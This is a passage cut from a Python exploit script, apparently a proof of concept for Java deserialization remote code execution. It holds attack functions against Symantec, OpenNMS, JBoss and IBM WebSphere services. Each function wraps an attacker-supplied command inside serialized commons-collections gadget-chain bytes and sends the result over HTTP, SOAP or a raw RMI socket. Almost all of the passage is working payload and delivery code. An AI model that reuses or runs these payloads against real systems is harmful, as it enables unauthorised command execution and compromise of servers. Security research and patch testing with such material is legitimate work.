\r\n fullpayload = \"\"\"------=_Part_0_992568364.1449677528532\r\nContent-Type: application/binary\r\nContent-Disposition: form-data; name=\"Content\"\r\n \r\n%s \r\n \r\n------=_Part_0_992568364.1449677528532--\r\n\"\"\" % java_payload\r\n \r\n if SSL_On:\r\n webservice = httplib2.Http(disable_ssl_certificate_validation=True)\r\n URL_ADDR = \"%s://%s:%s\" % ('https',HOST,PORT)\r\n else:\r\n webservice = httplib2.Http()\r\n URL_ADDR = \"%s://%s:%s\" % ('http',HOST,PORT)\r\n \r\n headers = {\"User-Agent\":\"Symantec_RCE_POC\",\r\n \"Content-type\":\"multipart/form-data;\",\r\n \"boundary\":\"----=_Part_0_992568364.1449677528532\",\r\n \"Accept\":\"text/html, image/gif, image/jpeg, *; 
q=.2, */*; q=.2\\r\\n\",\r\n \"Connection\":\"keep-alive\",\r\n \"Content-length\":\"%d\" % len(fullpayload)\r\n }\r\n resp, content = webservice.request(URL_ADDR+\"/servlet/ConsoleServlet?ActionType=SendStatPing\", \"POST\", body=fullpayload, headers=headers)\r\n # print provided response.\r\n print(\"[i] Response received from target: %s\" % resp)\r\n \r\ndef opennms_attack(HOST, PORT, _cmd):\r\n # The below code is based on the opennms_java_serialize.nasl script within Nessus\r\n \"\"\"\r\n This function sets up the attack payload for OpenNMS\r\n \"\"\"\r\n clen = len(_cmd)\r\n d1 = '\\x4a\\x52\\x4d\\x49\\x00\\x02\\x4b'\r\n d2 = '\\x00\\x09\\x31\\x32\\x37\\x2e\\x30\\x2e\\x31\\x2e\\x31\\x00\\x00\\x00\\x00\\x50\\xac\\xed\\x00\\x05\\x77\\x22\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x44\\x15\\x4d\\xc9\\xd4\\xe6\\x3b\\xdf\\x74\\x00\\x05\\x70\\x77\\x6e\\x65\\x64\\x73\\x7d\\x00\\x00\\x00\\x01\\x00\\x0f\\x6a\\x61\\x76\\x61\\x2e\\x72\\x6d\\x69\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x70\\x78\\x72\\x00\\x17\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x50\\x72\\x6f\\x78\\x79\\xe1\\x27\\xda\\x20\\xcc\\x10\\x43\\xcb\\x02\\x00\\x01\\x4c\\x00\\x01\\x68\\x74\\x00\\x25\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2f\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x3b\\x70\\x78\\x70\\x73\\x72\\x00\\x32\\x73\\x75\\x6e\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x61\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x2e\\x41\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x55\\xca\\xf5\\x0f\\x15\\xcb\\x7e\\xa5\\x02\\x00\\x02\\x4c\\x00\\x0c\\x6d\\x65\\x6d\\x62\\x65\\x72\\x56\\x61\\x6c\\x75\\x65\\x73\\x74\\x00\\x0f\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x4d\\x61\\x70\\x3b\\x4
c\\x00\\x04\\x74\\x79\\x70\\x65\\x74\\x00\\x11\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x70\\x78\\x70\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x48\\x61\\x73\\x68\\x4d\\x61\\x70\\x05\\x07\\xda\\xc1\\xc3\\x16\\x60\\xd1\\x03\\x00\\x02\\x46\\x00\\x0a\\x6c\\x6f\\x61\\x64\\x46\\x61\\x63\\x74\\x6f\\x72\\x49\\x00\\x09\\x74\\x68\\x72\\x65\\x73\\x68\\x6f\\x6c\\x64\\x70\\x78\\x70\\x3f\\x40\\x00\\x00\\x00\\x00\\x00\\x0c\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x01\\x71\\x00\\x7e\\x00\\x00\\x73\\x71\\x00\\x7e\\x00\\x05\\x73\\x7d\\x00\\x00\\x00\\x01\\x00\\x0d\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x4d\\x61\\x70\\x70\\x78\\x71\\x00\\x7e\\x00\\x02\\x73\\x71\\x00\\x7e\\x00\\x05\\x73\\x72\\x00\\x2a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x6d\\x61\\x70\\x2e\\x4c\\x61\\x7a\\x79\\x4d\\x61\\x70\\x6e\\xe5\\x94\\x82\\x9e\\x79\\x10\\x94\\x03\\x00\\x01\\x4c\\x00\\x07\\x66\\x61\\x63\\x74\\x6f\\x72\\x79\\x74\\x00\\x2c\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x70\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x68\\x61\\x69\\x6e\\x65\\x64\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x30\\xc7\\x97\\xec\\x28\\x7a\\x97\\x04\\x02\\x00\\x01\\x5b\\x00\\x0d\\x69\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x73\\x74\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x6
6\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x70\\x78\\x70\\x75\\x72\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\xbd\\x56\\x2a\\xf1\\xd8\\x34\\x18\\x99\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x05\\x73\\x72\\x00\\x3b\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x58\\x76\\x90\\x11\\x41\\x02\\xb1\\x94\\x02\\x00\\x01\\x4c\\x00\\x09\\x69\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x70\\x78\\x70\\x76\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x52\\x75\\x6e\\x74\\x69\\x6d\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x70\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x49\\x6e\\x76\\x6f\\x6b\\x65\\x72\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x87\\xe8\\xff\\x6b\\x7b\\x7c\\xce\\x38\\x02\\x00\\x03\\x5b\\x00\\x05\\x69\\x41\\x72\\x67\\x73\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x4c\\x00\\x0b\\x69\\x4d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x0b\\x69\\x50\\x61\\x72\\x61\\x6d\\x54\\x79\\x70\\x65\\x73\\x74\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x70\\x78\\x70\\x75\\x72\\x0
0\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x90\\xce\\x58\\x9f\\x10\\x73\\x29\\x6c\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x02\\x74\\x00\\x0a\\x67\\x65\\x74\\x52\\x75\\x6e\\x74\\x69\\x6d\\x65\\x75\\x72\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x43\\x6c\\x61\\x73\\x73\\x3b\\xab\\x16\\xd7\\xae\\xcb\\xcd\\x5a\\x99\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x00\\x74\\x00\\x09\\x67\\x65\\x74\\x4d\\x65\\x74\\x68\\x6f\\x64\\x75\\x71\\x00\\x7e\\x00\\x24\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\xa0\\xf0\\xa4\\x38\\x7a\\x3b\\xb3\\x42\\x02\\x00\\x00\\x70\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x24\\x73\\x71\\x00\\x7e\\x00\\x1c\\x75\\x71\\x00\\x7e\\x00\\x21\\x00\\x00\\x00\\x02\\x70\\x75\\x71\\x00\\x7e\\x00\\x21\\x00\\x00\\x00\\x00\\x74\\x00\\x06\\x69\\x6e\\x76\\x6f\\x6b\\x65\\x75\\x71\\x00\\x7e\\x00\\x24\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x70\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x21\\x73\\x71\\x00\\x7e\\x00\\x1c\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d\\x7b\\x47\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x01\\x74'\r\n d2 += '\\x00' + chr(clen)\r\n d2 += _cmd\r\n d2 += 
'\\x74\\x00\\x04\\x65\\x78\\x65\\x63\\x75\\x71\\x00\\x7e\\x00\\x24\\x00\\x00\\x00\\x01\\x71\\x00\\x7e\\x00\\x29\\x73\\x71\\x00\\x7e\\x00\\x17\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x49\\x6e\\x74\\x65\\x67\\x65\\x72\\x12\\xe2\\xa0\\xa4\\xf7\\x81\\x87\\x38\\x02\\x00\\x01\\x49\\x00\\x05\\x76\\x61\\x6c\\x75\\x65\\x70\\x78\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4e\\x75\\x6d\\x62\\x65\\x72\\x86\\xac\\x95\\x1d\\x0b\\x94\\xe0\\x8b\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x01\\x73\\x71\\x00\\x7e\\x00\\x09\\x3f\\x40\\x00\\x00\\x00\\x00\\x00\\x10\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x78\\x78\\x76\\x72\\x00\\x12\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x76\\x65\\x72\\x72\\x69\\x64\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x70\\x78\\x70\\x71\\x00\\x7e\\x00\\x3f\\x78\\x71\\x00\\x7e\\x00\\x3f'\r\n \r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.bind((HOST, PORT))\r\n print(\"[i] Sending initial packets to OpenNMS RMI service\")\r\n s.sendall(d1)\r\n retdata = s.recv(8192)\r\n if retdata:\r\n #\r\n # We have received some data suggesting the OpenNMS RMI Registry has responded.\r\n # Time to exploit.\r\n #\r\n print(\"[+] OpenNMS RMI service responded. Sending the exploit code...\")\r\n s.sendall(d2)\r\n else:\r\n print(\"[-] Sorry, the RMI service didnt respond. 
Revert to manual attack.\")\r\n return 0\r\n \r\ndef jboss_attack(HOST, PORT, SSL_On, _cmd):\r\n # The below code is based on the jboss_java_serialize.nasl script within Nessus \r\n \"\"\"\r\n This function sets up the attack payload for JBoss\r\n \"\"\"\r\n body_serObj = hex2raw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r\n \r\n cleng = len(_cmd)\r\n body_serObj += chr(cleng) + _cmd\r\n body_serObj += hex2raw3(\"740004657865637571007E001E0000000171007E00237371007E0011737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F40000000000010770800000010000000007878767200126A6176612E6C616E672E4F766572726964650000000000000000000000787071007E003A\")\r\n \r\n if SSL_On:\r\n webservice = httplib2.Http(disable_ssl_certificate_validation=True)\r\n URL_ADDR = \"%s://%s:%s\" % ('https',HOST,PORT)\r\n else:\r\n webservice = httplib2.Http()\r\n URL_ADDR = \"%s://%s:%s\" % ('http',HOST,PORT)\r\n headers = {\"User-Agent\":\"JBoss_RCE_POC\",\r\n \"Content-type\":\"application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue\",\r\n \"Content-length\":\"%d\" % len(body_serObj)\r\n }\r\n resp, content = webservice.request(URL_ADDR+\"/invoker/JMXInvokerServlet\", \"POST\", body=body_serObj, headers=headers)\r\n # print provided response.\r\n print(\"[i] Response received from target: %s\" % resp)\r\n \r\ndef websphere_attack(HOST, PORT, SSL_On, _cmd):\r\n # The below code is based on the websphere_java_serialize.nasl script within Nessus\r\n \"\"\"\r\n This function sets up the attack payload for IBM WebSphere\r\n \"\"\"\r\n serObj3 = hex2raw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etup initial parts of the payload packet\r\n cleng = len(_cmd) # Get the length of the payload\r\n serObj3 += chr(cleng) + _cmd # Convert the length to 
byte string, prepend to the payload and concatenate with the serialised payload.\r\n serObj3 += hex2raw3(\"740004657865637571007E001E0000000171007E00237371007E0011737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F40000000000010770800000010000000007878767200126A6176612E6C616E672E4F766572726964650000000000000000000000787071007E003A\") # Complete the payload packet\r\n serObjB64_3 = base64.b64encode(serObj3.encode('ascii', errors='ignore')) # Base64 encode the whole payload\r\n \r\n body = \"\"\"<?xml version='1.0' encoding='UTF-8'?>\r\n <SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\r\n <SOAP-ENV:Header ns0:JMXConnectorContext=\"rO0ABXNyAA9qYXZhLnV0aWwuU3RhY2sQ/irCuwmGHQIAAHhyABBqYXZhLnV0aWwuVmVjdG9y2Zd9W4A7rwEDAANJABFjYXBhY2l0eUluY3JlbWVudEkADGVsZW1lbnRDb3VudFsAC2VsZW1lbnREYXRhdAATW0xqYXZhL2xhbmcvT2JqZWN0O3hwAAAAAAAAAAF1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAAKc3IAOmNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3IuSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnTblRMyYyF8sQIABUwACGNlbGxOYW1ldAASTGphdmEvbGFuZy9TdHJpbmc7TAAIaG9zdE5hbWVxAH4AB0wACG5vZGVOYW1lcQB+AAdMAApzZXJ2ZXJOYW1lcQB+AAdbAApzdGFja1RyYWNldAAeW0xqYXZhL2xhbmcvU3RhY2tUcmFjZUVsZW1lbnQ7eHB0AAB0AAhMYXAzOTAxM3EAfgAKcQB+AAp1cgAeW0xqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnQ7AkYqPDz9IjkCAAB4cAAAACpzcgAbamF2YS5sYW5nLlN0YWNrVHJhY2VFbGVtZW50YQnFmiY23YUCAARJAApsaW5lTnVtYmVyTAAOZGVjbGFyaW5nQ2xhc3NxAH4AB0wACGZpbGVOYW1lcQB+AAdMAAptZXRob2ROYW1lcQB+AAd4cAAAAEt0ADpjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHRFbGVtZW50dAAfSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnQuamF2YXQABjxpbml0PnNxAH4ADgAAADx0ADNjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHR0ABhK
TVhDb25uZWN0b3JDb250ZXh0LmphdmF0AARwdXNoc3EAfgAOAAAGQ3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAcZ2V0Sk1YQ29ubmVjdG9yQ29udGV4dEhlYWRlcnNxAH4ADgAAA0h0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQAEmludm9rZVRlbXBsYXRlT25jZXNxAH4ADgAAArF0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQADmludm9rZVRlbXBsYXRlc3EAfgAOAAACp3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAOaW52b2tlVGVtcGxhdGVzcQB+AA4AAAKZdAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA4AAAHndAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA7/////dAAVY29tLnN1bi5wcm94eS4kUHJveHkwcHQABmludm9rZXNxAH4ADgAAAOB0ACVjb20uaWJtLndzLm1hbmFnZW1lbnQuQWRtaW5DbGllbnRJbXBsdAAUQWRtaW5DbGllbnRJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAADYdAA9Y29tLmlibS53ZWJzcGhlcmUubWFuYWdlbWVudC5jb25maWdzZXJ2aWNlLkNvbmZpZ1NlcnZpY2VQcm94eXQAF0NvbmZpZ1NlcnZpY2VQcm94eS5qYXZhdAARZ2V0VW5zYXZlZENoYW5nZXNzcQB+AA4AAAwYdAAmY29tLmlibS53cy5zY3JpcHRpbmcuQWRtaW5Db25maWdDbGllbnR0ABZBZG1pbkNvbmZpZ0NsaWVudC5qYXZhdAAKaGFzQ2hhbmdlc3NxAH4ADgAAA/Z0AB5jb20uaWJtLndzLnNjcmlwdGluZy5XYXN4U2hlbGx0AA5XYXN4U2hlbGwuamF2YXQACHRpbWVUb0dvc3EAfgAOAAAFm3QAImNvbS5pYm0ud3Muc2NyaXB0aW5nLkFic3RyYWN0U2hlbGx0ABJBYnN0cmFjdFNoZWxsLmphdmF0AAtpbnRlcmFjdGl2ZXNxAH4ADgAACPp0ACJjb20uaWJtLndzLnNjcmlwdGluZy5BYnN0cmFjdFNoZWxsdAASQWJzdHJhY3RTaGVsbC5qYXZhdAADcnVuc3EAfgAOAAAElHQAHmNvbS5pYm0ud3Muc2NyaXB0aW5nLldhc3hTaGVsbHQADldhc3hTaGVsbC5qYXZhdAAEbWFpbnNxAH4ADv////50ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQAB2ludm9rZTBzcQB+AA4AAAA8dAAkc3VuLnJlZmxlY3QuTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsdAAdTmF0aXZlTWV0aG9kQWNjZXNz
b3JJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAAAldAAoc3VuLnJlZmxlY3QuRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbHQAIURlbGVnYXRpbmdNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAAmN0ABhqYXZhLmxhbmcucmVmbGVjdC5NZXRob2R0AAtNZXRob2QuamF2YXQABmludm9rZXNxAH4ADgAAAOp0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAKbGF1bmNoTWFpbnNxAH4ADgAAAGB0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAEbWFpbnNxAH4ADgAAAE10ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAACS3QANG9yZy5lY2xpcHNlLmVxdWlub3guaW50ZXJuYWwuYXBwLkVjbGlwc2VBcHBDb250YWluZXJ0ABhFY2xpcHNlQXBwQ29udGFpbmVyLmphdmF0ABdjYWxsTWV0aG9kV2l0aEV4Y2VwdGlvbnNxAH4ADgAAAMZ0ADFvcmcuZWNsaXBzZS5lcXVpbm94LmludGVybmFsLmFwcC5FY2xpcHNlQXBwSGFuZGxldAAVRWNsaXBzZUFwcEhhbmRsZS5qYXZhdAADcnVuc3EAfgAOAAAAbnQAPG9yZy5lY2xpcHNlLmNvcmUucnVudGltZS5pbnRlcm5hbC5hZGFwdG9yLkVjbGlwc2VBcHBMYXVuY2hlcnQAF0VjbGlwc2VBcHBMYXVuY2hlci5qYXZhdAAOcnVuQXBwbGljYXRpb25zcQB+AA4AAABPdAA8b3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmludGVybmFsLmFkYXB0b3IuRWNsaXBzZUFwcExhdW5jaGVydAAXRWNsaXBzZUFwcExhdW5jaGVyLmphdmF0AAVzdGFydHNxAH4ADgAAAXF0AC9vcmcuZWNsaXBzZS5jb3JlLnJ1bnRpbWUuYWRhcHRvci5FY2xpcHNlU3RhcnRlcnQAE0VjbGlwc2VTdGFydGVyLmphdmF0AANydW5zcQB+AA4AAACzdAAvb3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmFkYXB0b3IuRWNsaXBzZVN0YXJ0ZXJ0ABNFY2xpcHNlU3RhcnRlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRo
b2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAABVHQAHm9yZy5lY2xpcHNlLmNvcmUubGF1bmNoZXIuTWFpbnQACU1haW4uamF2YXQAD2ludm9rZUZyYW1ld29ya3NxAH4ADgAAARp0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AAhiYXNpY1J1bnNxAH4ADgAAA9V0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AANydW5zcQB+AA4AAAGQdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQADWxhdW5jaEVjbGlwc2VzcQB+AA4AAACjdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQABG1haW5wcHBwcHBwcHB4\" xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"8.5.5.7\" ns0:JMXMessageVersion=\"1.2.0\" ns0:JMXVersion=\"1.2.0\">\r\n </SOAP-ENV:Header>\r\n <SOAP-ENV:Body>\r\n <ns1:invoke xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\r\n <objectname 